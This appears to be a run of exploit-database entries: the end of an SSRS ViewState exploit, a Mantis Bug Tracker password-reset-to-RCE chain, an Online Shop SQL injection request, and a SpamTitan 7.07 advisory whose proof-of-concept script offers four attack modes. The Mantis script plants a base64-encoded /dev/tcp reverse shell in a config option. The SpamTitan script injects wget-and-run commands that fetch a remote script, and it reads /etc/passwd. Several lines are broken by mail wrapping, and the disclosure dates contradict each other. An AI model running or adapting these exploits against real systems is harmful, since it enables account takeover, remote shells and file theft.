        """Turn on wire-level HTTP logging (httplib fallback keeps Python 2 working)."""
        self.info('debugging enabled')
        try:
            import http.client as http_client
        except ImportError:
            import httplib as http_client
        http_client.HTTPConnection.debuglevel = 1
        logging.basicConfig()
        logging.getLogger().setLevel(logging.DEBUG)
        requests_log = logging.getLogger("requests.packages.urllib3")
        requests_log.setLevel(logging.DEBUG)
        requests_log.propagate = True
        return self

    def getForm(self):
        """Fetch the target page and merge its form fields into self.form.

        Not invoked from the ``__main__`` block in this listing. A failed
        doGet returns ``None`` and this raises AttributeError on ``.content``.
        """
        self.info('retrieving form values')
        resp = self.doGet(url=self.target)
        self.parsePage(content=resp.content)
        return self

    def exploit(self):
        """POST the prepared form to the target and report the status code.

        Raises AttributeError if doPost returned ``None`` after an error.
        """
        self.info('exploiting target')
        resp = self.doPost(url=self.target, params=self.params,
                           values=self.form)
        self.info('received response %d' % resp.status_code)
        return self
if __name__ == '__main__':
    # Single-dash long option names; argparse accepts them as given.
    parser = argparse.ArgumentParser(
        description='CVE-2020-0618 SQL Server Reporting Services
ViewState Deserialization exploit',
        add_help=True
    )
    try:
        # -target has no default: if omitted the URL becomes
        # 'None/ReportServer/...'. -debug and -redirect use action='store',
        # so any supplied value (even the text 'False') is truthy.
        parser.add_argument('-target', action='store', help='Target
address: http(s)://target.com ')
        parser.add_argument('-username', action='store', default='',
                            help='Username to use: first.last')
        parser.add_argument('-domain', action='store', default='',
                            help='User domain to use: domain.local')
        parser.add_argument('-password', action='store', default='',
                            help='Password to use: Summer2020')
        parser.add_argument('-debug', action='store', default=False,
                            help='Enable debugging: False')
        parser.add_argument('-redirect', action='store',
                            default=False, help='Follow redirects: False')
        parser.add_argument('-proxy', action='store', default='',
                            help='Enable proxy: 10.10.10.10:8080')
        parser.add_argument('-path', action='store',
                            default='/ReportServer/pages/ReportViewer.aspx', help='Path to page')
        if len(argv) == 1:
            parser.print_help()
            exit(1)
        options = parser.parse_args()
        # getForm() is not called here, so the POST carries an empty
        # __VIEWSTATE plus the two NavigationCorrector fields only.
        Exploit(opt=options).exploit()
    except Exception as error:
        stderr.write('[-] error in main %s\n' % str(error))
Regards,
West Shepherd
OSWE | OSCE | OSCP | OSWP | CEH | Security+
West Lee Shepherd, LLC
# Exploit Title: Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)
# Date: 2020-09-17
# Vulnerability Discovery: hyp3rlinx, permanull
# Exploit Author: Nikolas Geiselman
# Vendor Homepage: https://mantisbt.org/
# Software Link: https://mantisbt.org/download.php
# Version: 1.3.0/2.3.0
# Tested on: Ubuntu 16.04/19.10/20.04
# CVE : CVE-2017-7615, CVE-2019-15715
# References:
# https://mantisbt.org/bugs/view.php?id=26091
# https://www.exploit-db.com/exploits/41890
'''
This exploit chains together two CVEs to achieve unauthenticated remote code execution.
The first portion of this exploit resets the Administrator password (CVE-2017-7615), discovered by John Page a.k.a. hyp3rlinx; this portion was modified from the original https://www.exploit-db.com/exploits/41890.
The second portion of this exploit takes advantage of a command injection vulnerability (CVE-2019-15715) discovered by 'permanull' (see references).
Usage:
Set netcat listener on port 4444
Send exploit with "python exploit.py"
Example output:
kali@kali:~/Desktop$ python exploit.py
Successfully hijacked account!
Successfully logged in!
Triggering reverse shell
Cleaning up
Deleting the dot_tool config.
Deleting the relationship_graph_enable config.
Successfully cleaned up
kali@kali:~/Desktop$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.116.135] from (UNKNOWN) [192.168.116.151] 43978
bash: cannot set terminal process group (835): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/mantisbt-2.3.0$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
'''
import requests
from urllib import quote_plus
from base64 import b64encode
from re import split
class exploit():
    """Chain CVE-2017-7615 (password reset) with CVE-2019-15715 (dot_tool injection).

    Written for Python 2 (print statements, ``urllib.quote_plus``). Every
    connection detail is hard-coded in ``__init__``. From a defensive
    standpoint the observable artefacts are: an unauthenticated request to
    ``verify.php`` with an empty ``confirm_hash`` followed by a POST to
    ``account_update.php``, and an administrator setting the ``dot_tool``
    configuration option to a shell pipeline instead of a binary path. See the
    references in the header for the vendor's tracking of both issues.
    """

    def __init__(self):
        """Set up the session and the hard-coded target/listener parameters."""
        self.s = requests.Session()
        self.headers = dict() # Initialize the headers dictionary
        self.RHOST = "192.168.116.151" # Victim IP
        self.RPORT = "80" # Victim port
        self.LHOST = "192.168.116.135" # Attacker IP
        self.LPORT = "4444" # Attacker Port
        self.verify_user_id = "1" # User id for the target account
        self.realname = "administrator" # Username to hijack
        self.passwd = "password" # New password after account hijack
        self.mantisLoc = "/mantisbt-2.3.0" # Location of mantis in URL
        # Python 2 b64encode takes a str; under Python 3 this line raises TypeError.
        self.ReverseShell = "echo " + b64encode("bash -i >& /dev/tcp/" + self.LHOST + "/" + self.LPORT + " 0>&1") + " | base64 -d | /bin/bash" # Reverse shell payload

    def reset_login(self):
        """Set a new password for ``verify_user_id`` via the unauthenticated verify.php flow.

        Exits the process when verify.php is not found; raises IndexError if the
        page holds no ``account_update_token``. Adds a Content-Type header to
        ``self.headers`` as a side effect, which later requests reuse.
        """
        # Request # 1: Grab the account update token
        url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/verify.php?id=' + self.verify_user_id + '&confirm_hash='
        r = self.s.get(url=url,headers=self.headers)
        if r.status_code == 404:
            print "ERROR: Unable to access password reset page"
            exit()
        account_update_token = r.text.split('name="account_update_token" value=')[1].split('"')[1]
        # Request # 2: Reset the account password
        url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/account_update.php'
        data = "account_update_token=" + account_update_token + "&password=" + self.passwd + "&verify_user_id=" + self.verify_user_id + "&realname=" + self.realname + "&password_confirm=" + self.passwd
        self.headers.update({'Content-Type':'application/x-www-form-urlencoded'})
        r = self.s.post(url=url, headers=self.headers, data=data)
        # A 200 is taken as success; the response body is not inspected.
        if r.status_code == 200:
            print "Successfully hijacked account!"

    def login(self):
        """Log in with the reset credentials; success means no redirect back to login_page.php."""
        data = "return=index.php&username=" + self.realname + "&password=" + self.passwd + "&secure_session=on"
        url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/login.php'
        r = self.s.post(url=url,headers=self.headers,data=data)
        if "login_page.php" not in r.url:
            print "Successfully logged in!"

    def CreateConfigOption(self, option, value):
        """Create a global (user 0 / project 0) config *option* with *value* via adm_config_set.php.

        Scrapes ``adm_config_set_token`` from adm_config_report.php first
        (IndexError if absent). The POST result is not checked.
        """
        # Get adm_config_set_token
        url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/adm_config_report.php'
        r = self.s.get(url=url, headers=self.headers)
        adm_config_set_token = r.text.split('name="adm_config_set_token" value=')[1].split('"')[1]
        # Create config
        data = "adm_config_set_token=" + adm_config_set_token + "&user_id=0&original_user_id=0&project_id=0&original_project_id=0&config_option=" + option + "&original_config_option=&type=0&value=" + quote_plus(value) + "&action=create&config_set=Create+Configuration+Option"
        url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/adm_config_set.php'
        r = self.s.post(url=url, headers=self.headers, data=data)

    def TriggerExploit(self):
        """Request workflow_graph_img.php, the page that invokes ``dot_tool`` (CVE-2019-15715).

        The 3-second timeout is expected to fire while the injected command
        runs; the bare ``except`` hides every other error too, so a narrower
        ``except requests.exceptions.RequestException`` would keep the intent.
        """
        print "Triggering reverse shell"
        url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/workflow_graph_img.php'
        try:
            r = self.s.get(url=url,headers=self.headers, timeout=3)
        except:
            pass

    def Cleanup(self):
        """Log in on a fresh session and delete the two config options created earlier.

        NOTE(review): ``cleaned_up`` only reflects the last option checked, so
        the final message can misreport; and if no report row matches
        ``config`` the ``cleanup_dict[...]`` lookups raise KeyError. The
        ``verify=False`` on the confirmation GET has no effect over plain http.
        """
        # Delete the config settings that were created to send the reverse shell
        print "Cleaning up"
        cleaned_up = False
        cleanup = requests.Session()
        CleanupHeaders = dict()
        CleanupHeaders.update({'Content-Type':'application/x-www-form-urlencoded'})
        data = "return=index.php&username=" + self.realname + "&password=" + self.passwd + "&secure_session=on"
        url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/login.php'
        r = cleanup.post(url=url,headers=CleanupHeaders,data=data)
        ConfigsToCleanup = ['dot_tool','relationship_graph_enable']
        for config in ConfigsToCleanup:
            # Get adm_config_delete_token
            url = "http://" + self.RHOST + ":" + self.RPORT + self.mantisLoc + "/adm_config_report.php"
            r = cleanup.get(url=url, headers=self.headers)
            # Each config row of the report is separated by this marker comment.
            test = split('<!-- Repeated Info Rows -->',r.text)
            # First element of the response list is garbage, delete it
            del test[0]
            cleanup_dict = dict()
            for i in range(len(test)):
                if config in test[i]:
                    cleanup_dict.update({'config_option':config})
                    cleanup_dict.update({'adm_config_delete_token':test[i].split('name="adm_config_delete_token" value=')[1].split('"')[1]})
                    cleanup_dict.update({'user_id':test[i].split('name="user_id" value=')[1].split('"')[1]})
                    cleanup_dict.update({'project_id':test[i].split('name="project_id" value=')[1].split('"')[1]})
            # Delete the config
            print "Deleting the " + config + " config."
            url = "http://" + self.RHOST + ":" + self.RPORT + self.mantisLoc + "/adm_config_delete.php"
            data = "adm_config_delete_token=" + cleanup_dict['adm_config_delete_token'] + "&user_id=" + cleanup_dict['user_id'] + "&project_id=" + cleanup_dict['project_id'] + "&config_option=" + cleanup_dict['config_option'] + "&_confirmed=1"
            r = cleanup.post(url=url,headers=CleanupHeaders,data=data)
            #Confirm if actually cleaned up
            r = cleanup.get(url="http://" + self.RHOST + ":" + self.RPORT + self.mantisLoc + "/adm_config_report.php", headers=CleanupHeaders, verify=False)
            if config in r.text:
                cleaned_up = False
            else:
                cleaned_up = True
        if cleaned_up == True:
            print "Successfully cleaned up"
        else:
            print "Unable to clean up configs"
# Script body, executed at import time (no __name__ guard). Order matters: the
# password reset must precede the login, and both options must exist before
# workflow_graph_img.php is requested. Rebinding the class name to the
# instance is deliberate in the original; nothing later needs the class.
exploit = exploit()
exploit.reset_login()
exploit.login()
exploit.CreateConfigOption(option="relationship_graph_enable",value="1")
# dot_tool holding a shell pipeline rather than a binary path is the artefact
# an administrator or log review would see in the config table.
exploit.CreateConfigOption(option="dot_tool",value= exploit.ReverseShell + ';')
exploit.TriggerExploit()
exploit.Cleanup()
# Exploit Title: Online Shop Project 1.0 - 'p' SQL Injection
# Date: 2020-09-20
# Exploit Author: Augkim
# Vendor Homepage: https://www.sourcecodester.com/php/14448/online-shop-project-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-shop-using-php.zip
# Tested on: Apache2
GET
/shop/product.php?p=2%20UNION%20ALL%20SELECT%201,2,3,4,@@datadir,6,7,8--%20-
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
Gecko/20100101 Firefox/80.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Origin: foo.example.org
PoC:
/URL/product.php?p=2%20UNION%20ALL%20SELECT%201,2,3,4,@@datadir,6,7,8--%20-
# Exploit Title: SpamTitan 7.07 - Remote Code Execution (Authenticated)
# Date: 2020-09-18
# Exploit Author: Felipe Molina (@felmoltor)
# Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/
# Software Link: https://www.titanhq.com/signup/?product_type=spamtitangateway
# Version: 7.07
# Tested on: FreeBSD
# CVE : CVE-2020-11699, CVE-2020-11700, CVE-2020-11803, CVE-2020-11804
---[SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code
Execution]------------------------------
SECURITY ADVISORY: SPUK-2020-09/SpamTitan 7.07 Multiple
Authenticated Remote Code Execution
Affected Software: SpamTitan Gateway 7.07 (possibly earlier versions)
Vulnerability: Multiple Authenticated Remote Code Execution
CVSSv3: 8.7
(https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N)
Severity: High
Release Date: 2020-09-18
CVEs: CVE-2020-11699, CVE-2020-11700, CVE-2020-11803,
CVE-2020-11804
I. Background
~~~~~~~~~~~~~
From www.spamtitan.com:
"SpamTitan Gateway is a powerful Anti-Spam appliance that equips network
administrators with extensive tools to control mail flow and protect against
unwanted email and malware."
II. Description
~~~~~~~~~~~~~~~
Multiple authenticated remote code execution (RCE) vulnerabilities were found
on the SpamTitan Gateway 7.07 and probably in previous versions:
* CVE-2020-11699: Improper validation of the parameter fname on the page
certs-x.php would allow an attacker to execute remote code on the
target server. The user has to be authenticated before interacting with
this page.
* CVE-2020-11700: Improper sanitization of the parameter fname, used on the page
certs-x.php, would allow an attacker to retrieve the contents of
arbitrary files. The user has to be
authenticated before interacting with this page.
* CVE-2020-11803: Improper sanitization of the parameter jaction when
interacting with
the page mailqueue.php could lead to PHP code evaluation server-side,
because the user-provided input is passed directly to the php eval()
function. The user has to be authenticated on the web platform before
interacting with the page.
* CVE-2020-11804: Due to improper sanitization of the parameter qid,
used in the page
mailqueue.php, code injection can occur. The input for this
parameter is provided directly by an authenticated user via an HTTP GET
request.
III. PoC
~~~~~~~~
Use Python 3 and install the following module before executing: requests.
If your IP is 192.168.1.5 and the target SpamTitan server is
spamtitan.example.com, call the PoC like this:
./multirce.py -t spamtitan.example.com -i 192.168.1.5 -m <EXPLOIT
NUMBER> -u <USER> -p <PASSWORD> -U http://192.168.1.5/rev.py
---------------------------------------------
#!/usr/bin/env python
# Author: Felipe Molina (@felmoltor)
# Date: 09/04/2020
# Python Version: 3.7
# Summary: This is PoC for multiple authenticated RCE and Arbitrary File Read
# 0days on SpamTitan 7.07 and previous versions.
# Product URL: https://www.spamtitan.com/
# Product Version: 7.07 and probably previous
import requests
from requests import Timeout
requests.packages.urllib3.disable_warnings()
import os
import threading
from optparse import OptionParser
import socket
import json
import re
from urllib.parse import urlparse
from time import sleep
from base64 import b64decode,b64encode
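def myip():
    """Return the local IPv4 address that would be used to reach the Internet.

    A UDP socket is "connected" to an arbitrary non-local address; no packet
    is sent, but the kernel selects a source address that getsockname() then
    reports. When the host has no route at all the loopback address is
    returned instead. The original caught every exception here; only OSError
    (which socket errors derive from) is expected, so the handler is narrowed
    and the socket is closed by the context manager.

    Returns:
        str: dotted-quad address, '127.0.0.1' on failure.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        try:
            # doesn't even have to be reachable
            s.connect(('10.255.255.255', 1))
            return s.getsockname()[0]
        except OSError:
            return '127.0.0.1'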
def shellServer(ip,port,quiet):
    """Accept one TCP connection on ``ip:port`` and relay an interactive session.

    Operator-side handler for the connection the CVE_* functions trigger: it
    waits for a single client, reads the remote prompt, then loops sending the
    typed line and printing whatever arrives until the one-second receive
    timeout. ``quiet`` is accepted but unused. NOTE(review): the listening
    socket ``servers`` is never closed, and ``completeanswer.strip()`` discards
    its result, so it is a no-op.
    """
    servers = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    servers.bind((ip, port))
    servers.listen(1)
    info("Waiting for incoming connection on %s:%s" % (ip,port))
    conn, addr = servers.accept()
    # Short timeout: the inner recv loop ends on socket.timeout.
    conn.settimeout(1)
    success("Hurray, we got a connection from %s" % addr[0])
    prompt =conn.recv(128)
    prompt=str(prompt.decode("utf-8")).strip()
    command = input(prompt)
    while True:
        try:
            c = "%s\n" % (command)
            if (len(c)>0):
                conn.sendall(c.encode("utf-8"))
            # Quit the console
            if command == 'exit':
                info("\nClosing connection")
                conn.close()
                break
            else:
                completeanswer=""
                while True:
                    answer=None
                    try:
                        answer=str((conn.recv(1024)).decode("utf-8"))
                        completeanswer+=answer
                    except socket.timeout:
                        completeanswer.strip()
                        break
                print(completeanswer,end='')
                command = input("")
        except (KeyboardInterrupt, EOFError):
            info("\nClosing connection")
            break
# This is an authenticated remote code execution in "certs-x.php". E.g:
def CVE_2020_11699(cookies, target, shellurl):
    """Authenticated RCE through the ``fname`` parameter of certs-x.php.

    Reads the CSRF name/token pair from certs.php, then POSTs
    ``jaction=deletecert`` with an ``fname`` that embeds a shell command
    substitution. Meant to run in a worker thread; the initial sleep gives the
    main thread time to start the listener. Detection: POSTs to certs-x.php
    whose ``fname`` contains shell metacharacters instead of a certificate
    name. Several literals below are wrapped across lines by the mailing-list
    formatting; the indentation here is reconstructed.
    """
    # Giving time to the main thread to open the reverse shell listener
    sleep(5)
    oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python
/tmp/r.py" % (shellurl)
    t1 = "%s/certs.php" % target
    t2 = "%s/certs-x.php" % target
    # get the csrf token value
    res1 = requests.get(t1,cookies=cookies,verify=False)
    m = re.search("var csrf_token_postdata
=.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text)
    if (m is not None):
        csrfguard=m.group(1)
        csrftoken=m.group(2)
        data = {
            "CSRFName":csrfguard,
            "CSRFToken":csrftoken,
            "jaction":"deletecert",
            "fname":"dummy || $(%s)" % oscmd
        }
        info("Triggering the reverse shell in the target.")
        # No timeout= is passed, so the Timeout handler is not expected to fire.
        try:
            res2 = requests.post(t2,data=data,cookies=cookies,verify=False)
            print(res2.text)
        except Timeout:
            info("Request timed-out. You should have received already
your reverse shell.")
    else:
        fail("CSRF tokens were not found. POST will fail.")
# This is an arbitrary file read on "certs-x.php"
def CVE_2020_11700(cookies,target,file):
    """Authenticated arbitrary file read through ``fname`` on certs-x.php.

    Uses the ``downloadkey`` action with a traversal-prefixed path and prints
    the response body on HTTP 200. ``file`` shadows the builtin. Returns
    ``False`` only when the CSRF tokens are missing, ``None`` otherwise.
    Detection: ``fname`` values containing ``../`` on certs-x.php. The regex
    literal below is wrapped across lines by the mailing-list formatting; the
    ``else`` is read here as belonging to the token check.
    """
    fullpath="../../../..%s" % file
    t1 = "%s/certs.php" % target
    t2 = "%s/certs-x.php" % target
    # get the csrf token value
    res1 = requests.get(t1,cookies=cookies,verify=False)
    m = re.search("var csrf_token_postdata
=.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text)
    if (m is not None):
        csrfguard=m.group(1)
        csrftoken=m.group(2)
        # The remaining form fields are sent empty so the request matches the
        # page's normal form submission.
        data = {
            "CSRFName":csrfguard,
            "CSRFToken":csrftoken,
            "jaction":"downloadkey",
            "fname":fullpath,
            "commonname":"",
            "organization":"",
            "organizationunit":"",
            "city":"",
            "state":"",
            "country":"",
            "csrout":"",
            "pkout":"",
            "importcert":"",
            "importkey":"",
            "importchain":""
        }
        res2 = requests.post(t2,data=data,cookies=cookies,verify=False)
        if (res2.status_code == 200):
            success("Contents of the file %s" % file)
            print(res2.text)
    else:
        fail("Error obtaining the CSRF guard tokens from the page.")
        return False
# This is an authenticated RCE abusing PHP eval function in mailqueue.php
def CVE_2020_11803(cookies, target, shellurl):
    """Authenticated RCE through PHP eval() of ``jaction`` in mailqueue.php.

    The command is base64-encoded into a ``jaction`` value that closes the
    evaluated string and calls shell_exec. The body is assembled by hand so
    requests does not URL-encode the payload. NOTE(review): ``proxies`` is
    not defined anywhere in this script, so the POST raises NameError unless
    it is defined elsewhere; and the ``None`` values in ``data`` become the
    literal text ``None`` in the hand-built body. Detection: ``jaction``
    values on mailqueue.php that are not one of the page's fixed action
    names. Several literals below are wrapped across lines by the
    mailing-list formatting; the indentation is reconstructed.
    """
    # Giving time to the main thread to open the reverse shell listener
    sleep(5)
    oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python
/tmp/r.py" % (shellurl)
    b64=(b64encode(oscmd.encode("utf-8"))).decode("utf-8")
    payload="gotopage+a+\";$b=\"%s\";shell_exec(base64_decode(urldecode($b)));die();$b=\""
% (b64)
    t1 = "%s/certs.php" % target
    t2 = "%s/mailqueue.php" % target
    # get the csrf token value
    res1 = requests.get(t1,cookies=cookies,verify=False)
    m = re.search("var csrf_token_postdata
=.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text)
    if (m is not None):
        csrfguard=m.group(1)
        csrftoken=m.group(2)
        data = {
            "CSRFName":csrfguard,
            "CSRFToken":csrftoken,
            "jaction":payload,
            "activepage":"incoming",
            "incoming_count":"0",
            "active_count":"0",
            "deferred_count":"0",
            "hold_count":"0",
            "corrupt_count":"0",
            "incoming_page":"1",
            "active_page":"1",
            "deferred_page":"1",
            "hold_page":"1",
            "corrupt_page":"1",
            "incomingrfilter":None,
            "incomingfilter":None,
            "incoming_option":"hold",
            "activerfilter":None,
            "activefilter":None,
            "active_option":"hold",
            "deferredrfilter":None,
            "deferredfilter":None,
            "deferred_option":"hold",
            "holdrfilter":None,
            "holdfilter":None,
            "hold_option":"release",
            "corruptrfilter":None,
            "corruptfilter":None,
            "corrupt_option":"delete"
        }
        # We have to pass a string instead of a dict if we don't want
        # the requests library to convert it to
        # an urlencoded data and break our payload
        datastr=""
        cont=0
        for k,v in data.items():
            datastr+="%s=%s" % (k,v)
            cont+=1
            if (cont<len(data)):
                datastr+="&"
        headers={
            "User-Agent":"Mozilla/5.0 (Windows NT 10.0; rv:68.0)
Gecko/20100101 Firefox/68.0",
            "Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        try:
            res2 =
requests.post(t2,data=datastr,cookies=cookies,headers=headers,verify=False,proxies=proxies)
        except Timeout:
            info("Request timed-out. You should have received already
your reverse shell.")
    else:
        fail("CSRF tokens were not found. POST will fail.")
# This is an authenticated RCE abusing qid GET parameter in mailqueue.php
def CVE_2020_11804(cookies, target, shellurl):
    """Authenticated RCE through the ``qid`` GET parameter of mailqueue.php.

    The command is appended to a numeric queue id with ``;`` and backticks and
    sent unencoded in the query string. Detection: any non-numeric ``qid`` on
    mailqueue.php. No timeout= is passed, so the Timeout handler is not
    expected to fire. Literals below are wrapped across lines by the
    mailing-list formatting.
    """
    # Giving time to the main thread to open the reverse shell listener
    sleep(5)
    oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python
/tmp/r.py" % (shellurl)
    payload="1;`%s`" % oscmd
    t = "%s/mailqueue.php?qid=%s" % (target,payload)
    info("Triggering the reverse shell in the target.")
    try:
        res2 = requests.get(t,cookies=cookies,verify=False)
    except Timeout:
        info("Request timed-out. You should have received already your
reverse shell.")
# Authenticate to the web platform and get the cookies
def authenticate(target, user, password):
    """Log in to the SpamTitan web UI and return its session cookies.

    POSTs the login form to ``<target>/login.php`` without following
    redirects and with TLS verification disabled. A 302 that sets at least
    one cookie counts as a successful login and the cookie jar is returned;
    any other outcome yields ``None``.
    """
    form = {
        "jaction": "none",
        "language": "en_US",
        "address": "%s" % user,
        "passwd": "%s" % password,
    }
    res = requests.post(
        "%s/login.php" % target,
        data=form,
        allow_redirects=False,
        verify=False,
    )
    logged_in = res.status_code == 302 and len(res.cookies.items()) > 0
    return res.cookies if logged_in else None
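def printmsg(msg, quiet=False, msgtype="i"):
    """Print *msg* prefixed with ``[<msgtype>]`` unless *quiet* is set.

    The original tested ``if (success):`` — a reference to the module-level
    function object, which is always truthy — so its ``[-]`` fallback branch
    was unreachable and the prefix always came from *msgtype*; that is what
    the info/success/fail wrappers rely on, so only *msgtype* is used here.

    Args:
        msg: text to print (formatted with ``%s``).
        quiet: when true nothing is printed.
        msgtype: single-character tag placed in the brackets.

    Returns:
        The printed line, or ``None`` when output was suppressed.
    """
    if quiet:
        return None
    line = "[%s] %s" % (msgtype, msg)
    print(line)
    return line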
def info(msg, quiet=False):
    """Emit *msg* as an informational ``[i]`` line unless *quiet* is set."""
    printmsg(msg, quiet=quiet, msgtype="i")
def success(msg, quiet=False):
    """Emit *msg* as a ``[+]`` success line unless *quiet* is set."""
    printmsg(msg, quiet=quiet, msgtype="+")
def fail(msg, quiet=False):
    """Emit *msg* as a ``[-]`` failure line unless *quiet* is set."""
    printmsg(msg, quiet=quiet, msgtype="-")
def parseoptions():
    """Build the optparse parser and return ``(options, arguments)``.

    Notes on what the code does: ``myip()`` is evaluated four times while the
    parser is built (two help strings and two defaults); the local-IP option
    is ``-I`` (upper case) although the usage text above writes ``-i``; the
    file-read option deliberately stores into ``filtetoread`` (sic), which is
    the name ``main`` reads. The ``admin``/``hiadmin`` defaults are the
    author's choice and are not verified here. The help strings below are
    wrapped across lines by the mailing-list formatting and would need to be
    rejoined before the file parses.
    """
    parser = OptionParser()
    parser.add_option("-t", "--target", dest="target",
                      help="Target SpamTitan URL to attack. E.g.:
https://spamtitan.com/", default=None)
    parser.add_option("-m", "--method", dest="method",
                      help="Exploit number: (1) CVE-2020-11699 [RCE],
(2) CVE-2020-XXXX [RCE], (3) CVE-2020-XXXX2 [RCE], (4) CVE-2020-11700
[File Read]", default=1)
    parser.add_option("-u", "--user", dest="user",
                      help="Username to authenticate with. Default:
admin", default="admin")
    parser.add_option("-p", "--password", dest="password",
                      help="Password to authenticate with. Default:
hiadmin", default="hiadmin")
    parser.add_option("-I", "--ip", dest="ip",
                      help="Local IP where to listen for the reverse
shell. Default: %s" % myip(), default=myip())
    parser.add_option("-P", "--port", dest="port",
                      help="Local Port where to listen for the reverse
shell. Default: 4242", default=4242)
    parser.add_option("-U", "--URL", dest="shellurl",
                      help="HTTP URL path where the reverse shell is
located. Default: http://%s/rev.py" % myip(),
                      default="http://%s/rev.py" % myip())
    parser.add_option("-f", "--filetoread", dest="filtetoread",
                      help="Full path of the file to read from the
remote server when executing CVE-2020-11700. Default: /etc/passwd",
                      default="/etc/passwd")
    parser.add_option("-q", "--quiet",
                      action="store_true", dest="quiet", default=False,
                      help="Shut up script! Just give me the shell.")
    return parser.parse_args()
def main():
    """Parse options, authenticate, then dispatch to the selected CVE function.

    Methods 1-3 start the request in a worker thread and run the listener in
    this thread; method 4 reads a file synchronously. The help text still
    shows ``CVE-2020-XXXX`` for methods 2 and 3, which here map to
    CVE-2020-11803 and CVE-2020-11804. Exit codes: 1 for a missing target or
    bad method, 2 for a failed login, 0 otherwise. Several literals below are
    wrapped across lines by the mailing-list formatting.
    """
    (options,arguments) = parseoptions()
    quiet = options.quiet
    target = options.target
    ip = options.ip
    port = options.port
    user = options.user
    password = options.password
    shellurl = options.shellurl
    # -m arrives as a string when given on the command line, as int 1 by default.
    method = int(options.method)
    rfile = options.filtetoread
    # Sanitize options
    if (target is None):
        fail("Error. Specify a target (-t).")
        exit(1)
    else:
        # A bare hostname is assumed to be plain http.
        if (not target.startswith("http://") and not
target.startswith("https://")):
            target = "http://%s" % target
    if (method < 1 or method > 4):
        fail("Error. Specify a method from 1 to 4:\n (1)
CVE-2020-11699 [RCE]\n (2) CVE-2020-XXXX [RCE]\n (3) CVE-2020-XXXX2
[RCE]\n (4) CVE-2020-11700 [File Read]")
        exit(1)
    # Before doing anything, login
    cookies = authenticate(target,user,password)
    if (cookies is not None):
        success("User logged in successfully.")
        if (method == 1):
            info("Exploiting CVE-2020-11699 to get a reverse shell on
%s:%s" % (ip,port),quiet)
            rev_thread = threading.Thread(target=CVE_2020_11699,
                                          args=(cookies,target,shellurl))
            rev_thread.start()
            # Open the reverse shell listener in this main thread
            info("Spawning a reverse shell listener. Wait for it...")
            shellServer(options.ip,int(options.port),options.quiet)
        elif (method == 2):
            info("Exploiting CVE-2020-11803 to get a reverse shell on
%s:%s" % (ip,port),quiet)
            rev_thread = threading.Thread(target=CVE_2020_11803,
                                          args=(cookies,target,shellurl))
            rev_thread.start()
            # Open the reverse shell listener in this main thread
            info("Spawning a reverse shell listener. Wait for it...")
            shellServer(options.ip,int(options.port),options.quiet)
        elif (method == 3):
            info("Exploiting CVE-2020-11804 to get a reverse shell on
%s:%s" % (ip,port),quiet)
            rev_thread = threading.Thread(target=CVE_2020_11804,
                                          args=(cookies,target,shellurl))
            rev_thread.start()
            # Open the reverse shell listener in this main thread
            info("Spawning a reverse shell listener. Wait for it...")
            shellServer(options.ip,int(options.port),options.quiet)
        elif (method == 4):
            info("Reading file '%s' by abusing CVE-2020-11700." % rfile, quiet)
            CVE_2020_11700(cookies,target,rfile)
    else:
        fail("Error authenticating. Are you providing valid credentials?")
        exit(2)
    exit(0)
# Entry point: runs on import as well, since there is no __name__ guard.
main()
---------------------------------------------
III. Impact
~~~~~~~~~~~
Loss of confidentiality, integrity and availability of several files in the
target server, as well as loss of availability of several services running
in the SpamTitan.
Confidentiality of critical system files, such as /etc/passwd or /etc/pwd.db
would be highly impacted.
IV. Disclosure
~~~~~~~~~~~~~~
Reported By: Felipe Molina de la Torre
Vendor Informed: 2020-04-17
Patch Release Date: 2019-05-26
Advisory Release Date: 2019-09-18
V. References
~~~~~~~~~~~~~
* https://sensepost.com/blog/2020/clash-of-the-spamtitan/
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11699
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11700
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11803
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11804
---------------------------------[SPUK-2020-09/SpamTitan 7.07 Multiple
Authenticated Remote Code Execution]---
# Exploit Title: Joplin 1.0.245 - Arbitrary Code Execution (PoC)
# Date: 2020-09-21
# Exploit Author: Ademar Nowasky Junior (@nowaskyjr)
# Vendor Homepage: https://joplinapp.org/
# Software Link: https://github.com/laurent22/joplin/releases/download/v1.0.245/Joplin-Setup-1.0.245.exe
# Version: 1.0.190 to 1.0.245
